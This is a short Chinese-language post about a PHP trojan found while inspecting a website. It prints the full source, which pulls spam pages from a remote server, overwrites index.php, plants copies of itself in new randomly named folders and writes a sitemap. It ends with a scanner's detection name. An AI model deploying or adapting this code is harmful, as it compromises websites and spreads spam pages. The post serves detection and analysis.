php木马之php垃圾内容生成器

在检测网站时，发现里面有很多木马网页，代码如下：

<?php
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://www.dzssc005.com";
$directory_Number=5;
$Branch_directory_1=getCode(mt_rand(3,5));
$Branch_directory_2=getCode(mt_rand(3,5));
$Branch_directory_3=getCode(mt_rand(3,5));
$Branch_directory_4=getCode(mt_rand(3,5));
$Branch_directory_5=getCode(mt_rand(3,5));
$Branch_directory_6=getCode(mt_rand(3,5));
$Branch_directory_7=getCode(mt_rand(3,5));
$Branch_directory_8=getCode(mt_rand(3,5));
$Branch_directory_9=getCode(mt_rand(3,5));
$Branch_directory_10=getCode(mt_rand(3,5));

$Branch_directory = $Branch_directory_1.".".$Branch_directory_2.".".$Branch_directory_3.".".$Branch_directory_4.".".$Branch_directory_5.".".$Branch_directory_6.".".$Branch_directory_7.".".$Branch_directory_8.".".$Branch_directory_9.".".$Branch_directory_10;

$NewFile_content = getFileCont("index.php");

if (empty($NewFile_content)) {
exit("Load......");
}

$ml = $_SERVER['REQUEST_URI'];
$str= explode("/", $ml);
$Quantity = count($str)-1;

$host_name = str_replace("index.php", "", "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);

if ($Quantity<6 && $Quantity>0) {
$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if ($Content_mb=="") $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if (strpos($Content_mb,"tj.js")) {
 echo $Content_mb;
$Remote_directory = $Remote_server."/directory.php?type=index.php&host=".$host_name."&directory=".$Branch_directory;
 $Content_directory = GetHtml($Remote_directory);
 $Branch_directory= explode(".",$Branch_directory);
$sitelinks="<li><a href='".$host_name."index.php'>".$host_name."index.php</a></li>";
 for ($i=0;$i < count($Branch_directory); $i++) {
 $dirname=$Branch_directory[$i];
 $check = CFolder("./".$dirname."/");
 if ($check == 1) {
WriteIn("./".$dirname."/index.php",base64_encode($NewFile_content));
$alink="<li><a href='".$host_name.$dirname."/index.php'>".$host_name.$dirname."/index.php</a></li>";
 $sitelinks.=$alink;

}
}

 $site_mb=GetHtml($Remote_server."/mb/sitemap.html");
 $site_mb=str_replace("{links}",$sitelinks,$site_mb);
 WriteIn("./sitemap.html",base64_encode($site_mb));

 WriteIn("./index.php",base64_encode($Content_mb));
 chmod("index.php",0644);

}

//echo "<meta http-equiv='refresh' content='0; url=index.php'>";
exit();

} else {
$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if ($Content_mb=="") $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if (strpos($Content_mb,"tj.js")) {
 WriteIn("./index.php",base64_encode($Content_mb));
 chmod("index.php",0644);
 echo $Content_mb;
}

exit();
}

function getCode($iCount) {
$arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789";
$code="";
for ( $i = 0; $i < $iCount; $i++ )
{
$code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];
}
return $code;
}

function Digital($iCount) {
$arrChar = "0123456789";
$code="";
for ( $i = 0; $i < $iCount; $i++ )
{
$code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];
}
return $code;
}

function sj_int($min, $max) {
return mt_rand($min, $max);
}

function WriteIn($testfile, $msg) {
if (empty($msg)) {
echo "Content null";
return;
}
$msg=base64_decode($msg);
$fp = @fopen($testfile,"w");
fwrite($fp,$msg);
fclose($fp);
}

function getFileCont($testfile) {
$restr = '';
$fp = @fopen($testfile,"r");
if ($fp) {
while($line=fgets($fp,1024)) $restr.=$line;
fclose($fp);
}
return $restr;
}

function CFolder($Filepath) {
 if (!file_exists($Filepath)) {
mkdir($Filepath, 0777);
return 1;
 }
 return 0;
}

function getHTTPPage($url) {
$opts = array(
 'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
 )
);

$context = stream_context_create($opts);

$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("Server Error...");
}

return $html;
}

function GetHtml($url) {
return getHTTPPage($url);
}

用护卫神云查杀工具扫描后，提示为“垃圾内容生成器-1748”